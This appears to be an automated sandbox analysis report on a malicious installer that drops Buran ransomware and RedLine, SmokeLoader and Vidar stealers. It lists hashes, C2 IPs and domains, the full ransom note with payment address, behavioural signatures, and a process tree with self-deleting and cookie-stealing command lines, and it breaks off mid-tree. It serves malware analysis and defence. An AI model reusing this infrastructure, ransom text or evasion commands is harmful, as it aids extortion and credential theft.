Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    1555s
  • max time network
    1805s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    25-08-2021 17:21

General

  • Target

    Setup (19).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. PAY FAST 500$=0.013 btc or the price will increase tomorrow bitcoin address bc1qqxnp9z0ff8x852dyflp5r9r6rzse8jl5hzmqz8 To be sure we have the decryptor and it works you can send an email: payfast290@mail2tor.com and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? payfast290@mail2tor.com TELEGRAM @ payfast290 Your personal ID: 2C9-431-C83 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Extracted

Family

redline

Botnet

25.08

C2

95.181.172.100:55640

Extracted

Family

redline

Botnet

ruzki

C2

95.217.248.44:1052

Extracted

Family

redline

Botnet

dibild2

C2

135.148.139.222:1494

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

supertraff

C2

135.148.139.222:1494

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 11 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 1 IoCs
  • Blocklisted process makes network request 28 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 25 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 8 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 24 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 54 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 18 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:1012
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1448
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2424
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
            PID:2708
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
            1⤵
              PID:2680
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Browser
              1⤵
              • Suspicious use of SetThreadContext
              • Modifies registry class
              PID:2560
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k SystemNetworkService
                2⤵
                • Drops file in System32 directory
                • Checks processor information in registry
                • Modifies data under HKEY_USERS
                • Modifies registry class
                PID:5996
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
              1⤵
                PID:2372
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1872
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1348
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1316
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1100
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:912
                        • C:\Users\Admin\AppData\Roaming\ebwjjcs
                          C:\Users\Admin\AppData\Roaming\ebwjjcs
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:2920
                          • C:\Users\Admin\AppData\Roaming\ebwjjcs
                            C:\Users\Admin\AppData\Roaming\ebwjjcs
                            3⤵
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:5204
                        • C:\Users\Admin\AppData\Roaming\ebwjjcs
                          C:\Users\Admin\AppData\Roaming\ebwjjcs
                          2⤵
                            PID:5800
                            • C:\Users\Admin\AppData\Roaming\ebwjjcs
                              C:\Users\Admin\AppData\Roaming\ebwjjcs
                              3⤵
                                PID:6792
                          • C:\Users\Admin\AppData\Local\Temp\Setup (19).exe
                            "C:\Users\Admin\AppData\Local\Temp\Setup (19).exe"
                            1⤵
                            • Checks computer location settings
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of WriteProcessMemory
                            PID:3212
                            • C:\Users\Admin\Documents\6wpKQMKcPGXsgR0Y6TK7JbZ1.exe
                              "C:\Users\Admin\Documents\6wpKQMKcPGXsgR0Y6TK7JbZ1.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:2716
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2716 -s 480
                                3⤵
                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                • Program crash
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3668
                            • C:\Users\Admin\Documents\GbIeiP3FxmJgspZ6aO54rfli.exe
                              "C:\Users\Admin\Documents\GbIeiP3FxmJgspZ6aO54rfli.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:2476
                              • C:\Users\Admin\Documents\GbIeiP3FxmJgspZ6aO54rfli.exe
                                C:\Users\Admin\Documents\GbIeiP3FxmJgspZ6aO54rfli.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4892
                            • C:\Users\Admin\Documents\aQ9FVvTMZz29VyK6h6WCTRKH.exe
                              "C:\Users\Admin\Documents\aQ9FVvTMZz29VyK6h6WCTRKH.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:2396
                              • C:\Users\Admin\Documents\aQ9FVvTMZz29VyK6h6WCTRKH.exe
                                C:\Users\Admin\Documents\aQ9FVvTMZz29VyK6h6WCTRKH.exe
                                3⤵
                                  PID:4920
                                • C:\Users\Admin\Documents\aQ9FVvTMZz29VyK6h6WCTRKH.exe
                                  C:\Users\Admin\Documents\aQ9FVvTMZz29VyK6h6WCTRKH.exe
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5096
                              • C:\Users\Admin\Documents\UvH3tlsmNWGn86urWnn0jcfN.exe
                                "C:\Users\Admin\Documents\UvH3tlsmNWGn86urWnn0jcfN.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2464
                              • C:\Users\Admin\Documents\_bJjUKncv9Rs7SvA28_Bn9PA.exe
                                "C:\Users\Admin\Documents\_bJjUKncv9Rs7SvA28_Bn9PA.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:2276
                              • C:\Users\Admin\Documents\LThWrZ1oqV9adRT9WRaE0Ppk.exe
                                "C:\Users\Admin\Documents\LThWrZ1oqV9adRT9WRaE0Ppk.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:2300
                              • C:\Users\Admin\Documents\J9yfhXckxeSOzhnwLQBd37AH.exe
                                "C:\Users\Admin\Documents\J9yfhXckxeSOzhnwLQBd37AH.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of SetWindowsHookEx
                                PID:4052
                              • C:\Users\Admin\Documents\XNpV2gejpd4kxspTnRdR3BOG.exe
                                "C:\Users\Admin\Documents\XNpV2gejpd4kxspTnRdR3BOG.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:3532
                                • C:\Users\Admin\Documents\XNpV2gejpd4kxspTnRdR3BOG.exe
                                  C:\Users\Admin\Documents\XNpV2gejpd4kxspTnRdR3BOG.exe
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:520
                                • C:\Users\Admin\Documents\XNpV2gejpd4kxspTnRdR3BOG.exe
                                  C:\Users\Admin\Documents\XNpV2gejpd4kxspTnRdR3BOG.exe
                                  3⤵
                                  • Executes dropped EXE
                                  PID:4936
                              • C:\Users\Admin\Documents\MJ5fWmvNAtEDPM60tXBK8sV9.exe
                                "C:\Users\Admin\Documents\MJ5fWmvNAtEDPM60tXBK8sV9.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4020
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  3⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4340
                              • C:\Users\Admin\Documents\PAk1rileOQHCXjNsqfo2p0w9.exe
                                "C:\Users\Admin\Documents\PAk1rileOQHCXjNsqfo2p0w9.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:3032
                              • C:\Users\Admin\Documents\a7vA6QTTyk3GgNjczY7ojVCX.exe
                                "C:\Users\Admin\Documents\a7vA6QTTyk3GgNjczY7ojVCX.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2732
                              • C:\Users\Admin\Documents\6iVhaqBa8ACvSHdPxu_TCq7t.exe
                                "C:\Users\Admin\Documents\6iVhaqBa8ACvSHdPxu_TCq7t.exe"
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2676
                                • C:\Users\Admin\AppData\Local\Temp\Build.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Build.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:4920
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 1244
                                    4⤵
                                    • Program crash
                                    PID:5732
                              • C:\Users\Admin\Documents\iZ1kPrJWZAZR6oS_8a7eNtUf.exe
                                "C:\Users\Admin\Documents\iZ1kPrJWZAZR6oS_8a7eNtUf.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1380
                              • C:\Users\Admin\Documents\QL3xCYvC37nipw6L5mS5DK13.exe
                                "C:\Users\Admin\Documents\QL3xCYvC37nipw6L5mS5DK13.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:2140
                                • C:\Users\Admin\Documents\QL3xCYvC37nipw6L5mS5DK13.exe
                                  "C:\Users\Admin\Documents\QL3xCYvC37nipw6L5mS5DK13.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: MapViewOfSection
                                  PID:4556
                              • C:\Users\Admin\Documents\MI4GdZn22wYIygcCk4on1V0q.exe
                                "C:\Users\Admin\Documents\MI4GdZn22wYIygcCk4on1V0q.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1616
                                • C:\Users\Admin\Documents\MI4GdZn22wYIygcCk4on1V0q.exe
                                  "C:\Users\Admin\Documents\MI4GdZn22wYIygcCk4on1V0q.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  PID:6056
                              • C:\Users\Admin\Documents\iOeJzsaF_Aja7bBEkmfiBr0m.exe
                                "C:\Users\Admin\Documents\iOeJzsaF_Aja7bBEkmfiBr0m.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3720
                                • C:\Users\Admin\AppData\Roaming\2374123.exe
                                  "C:\Users\Admin\AppData\Roaming\2374123.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:360
                                • C:\Users\Admin\AppData\Roaming\4146116.exe
                                  "C:\Users\Admin\AppData\Roaming\4146116.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  PID:4624
                                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5688
                                • C:\Users\Admin\AppData\Roaming\6545014.exe
                                  "C:\Users\Admin\AppData\Roaming\6545014.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  PID:2504
                                • C:\Users\Admin\AppData\Roaming\2671585.exe
                                  "C:\Users\Admin\AppData\Roaming\2671585.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3472
                              • C:\Users\Admin\Documents\YoVejM7mv3rNyBgXmMDiuQED.exe
                                "C:\Users\Admin\Documents\YoVejM7mv3rNyBgXmMDiuQED.exe"
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:2444
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 760
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5288
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 792
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5552
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 812
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5792
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 824
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5960
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 956
                                  3⤵
                                  • Program crash
                                  PID:5172
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 1000
                                  3⤵
                                  • Program crash
                                  PID:5592
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 1016
                                  3⤵
                                  • Program crash
                                  PID:5848
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 1392
                                  3⤵
                                  • Program crash
                                  PID:6100
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 1444
                                  3⤵
                                  • Program crash
                                  PID:5920
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 1464
                                  3⤵
                                  • Program crash
                                  PID:5708
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 1652
                                  3⤵
                                  • Program crash
                                  PID:4480
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 1616
                                  3⤵
                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                  • Program crash
                                  PID:5328
                              • C:\Users\Admin\Documents\8LFb4CPL3_CXSBYOAUoZXSmp.exe
                                "C:\Users\Admin\Documents\8LFb4CPL3_CXSBYOAUoZXSmp.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:2220
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 388
                                  3⤵
                                  • Program crash
                                  PID:5592
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 364
                                  3⤵
                                  • Program crash
                                  PID:5836
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 396
                                  3⤵
                                  • Program crash
                                  PID:6064
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 624
                                  3⤵
                                  • Program crash
                                  PID:5684
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 696
                                  3⤵
                                  • Program crash
                                  PID:5228
                                • C:\Users\Admin\Documents\8LFb4CPL3_CXSBYOAUoZXSmp.exe
                                  "C:\Users\Admin\Documents\8LFb4CPL3_CXSBYOAUoZXSmp.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  PID:6572
                              • C:\Users\Admin\Documents\UjjOIq6arlbvPb8eAtChdngq.exe
                                "C:\Users\Admin\Documents\UjjOIq6arlbvPb8eAtChdngq.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:4088
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\9168268656.exe"
                                  3⤵
                                    PID:4416
                                    • C:\Users\Admin\AppData\Local\Temp\9168268656.exe
                                      "C:\Users\Admin\AppData\Local\Temp\9168268656.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:5668
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\9168268656.exe"
                                        5⤵
                                          PID:4008
                                          • C:\Windows\SysWOW64\timeout.exe
                                            timeout /T 10 /NOBREAK
                                            6⤵
                                            • Delays execution with timeout.exe
                                            PID:4692
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0570247822.exe"
                                      3⤵
                                        PID:208
                                        • C:\Users\Admin\AppData\Local\Temp\0570247822.exe
                                          "C:\Users\Admin\AppData\Local\Temp\0570247822.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:2776
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\0570247822.exe"
                                            5⤵
                                              PID:7056
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /T 10 /NOBREAK
                                                6⤵
                                                • Delays execution with timeout.exe
                                                PID:7160
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "UjjOIq6arlbvPb8eAtChdngq.exe" /f & erase "C:\Users\Admin\Documents\UjjOIq6arlbvPb8eAtChdngq.exe" & exit
                                          3⤵
                                            PID:5164
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /im "UjjOIq6arlbvPb8eAtChdngq.exe" /f
                                              4⤵
                                              • Suspicious use of SetThreadContext
                                              • Kills process with taskkill
                                              PID:2476
                                        • C:\Users\Admin\Documents\6Mwr2LgYLdy0pzKKWOucRMHb.exe
                                          "C:\Users\Admin\Documents\6Mwr2LgYLdy0pzKKWOucRMHb.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          PID:200
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "6Mwr2LgYLdy0pzKKWOucRMHb.exe" /f & erase "C:\Users\Admin\Documents\6Mwr2LgYLdy0pzKKWOucRMHb.exe" & exit
                                            3⤵
                                              PID:5124
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /im "6Mwr2LgYLdy0pzKKWOucRMHb.exe" /f
                                                4⤵
                                                • Kills process with taskkill
                                                PID:5864
                                          • C:\Users\Admin\Documents\Lx3ZelZW8IczhoEgsc735uu7.exe
                                            "C:\Users\Admin\Documents\Lx3ZelZW8IczhoEgsc735uu7.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3068
                                          • C:\Users\Admin\Documents\zzeEzJAoSsnjCysq9pg_YaTb.exe
                                            "C:\Users\Admin\Documents\zzeEzJAoSsnjCysq9pg_YaTb.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:4220
                                          • C:\Users\Admin\Documents\WxhgoFM8nDYHSLbihY9RkZyG.exe
                                            "C:\Users\Admin\Documents\WxhgoFM8nDYHSLbihY9RkZyG.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Checks BIOS information in registry
                                            • Checks whether UAC is enabled
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4264
                                          • C:\Users\Admin\Documents\85WyCE2HDvsyP7uVOs0BubQ0.exe
                                            "C:\Users\Admin\Documents\85WyCE2HDvsyP7uVOs0BubQ0.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:4172
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 664
                                              3⤵
                                              • Program crash
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2312
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 684
                                              3⤵
                                              • Program crash
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4100
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 676
                                              3⤵
                                              • Program crash
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2172
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 700
                                              3⤵
                                              • Program crash
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4728
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 1068
                                              3⤵
                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                              • Program crash
                                              PID:2948
                                          • C:\Users\Admin\Documents\yULMYgqk5fQU1vN5YHZxjMTQ.exe
                                            "C:\Users\Admin\Documents\yULMYgqk5fQU1vN5YHZxjMTQ.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:4328
                                            • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                              "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:5028
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                • Executes dropped EXE
                                                PID:2228
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                • Executes dropped EXE
                                                PID:5948
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                • Executes dropped EXE
                                                PID:3820
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                  PID:5488
                                              • C:\Program Files (x86)\Company\NewProduct\inst1.exe
                                                "C:\Program Files (x86)\Company\NewProduct\inst1.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                PID:4988
                                              • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                3⤵
                                                  PID:4928
                                                • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                  "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  PID:4900
                                              • C:\Users\Admin\Documents\2OjH7UnxQxBPkF1aGKWB2Hg7.exe
                                                "C:\Users\Admin\Documents\2OjH7UnxQxBPkF1aGKWB2Hg7.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:4312
                                                • C:\Windows\SysWOW64\mshta.exe
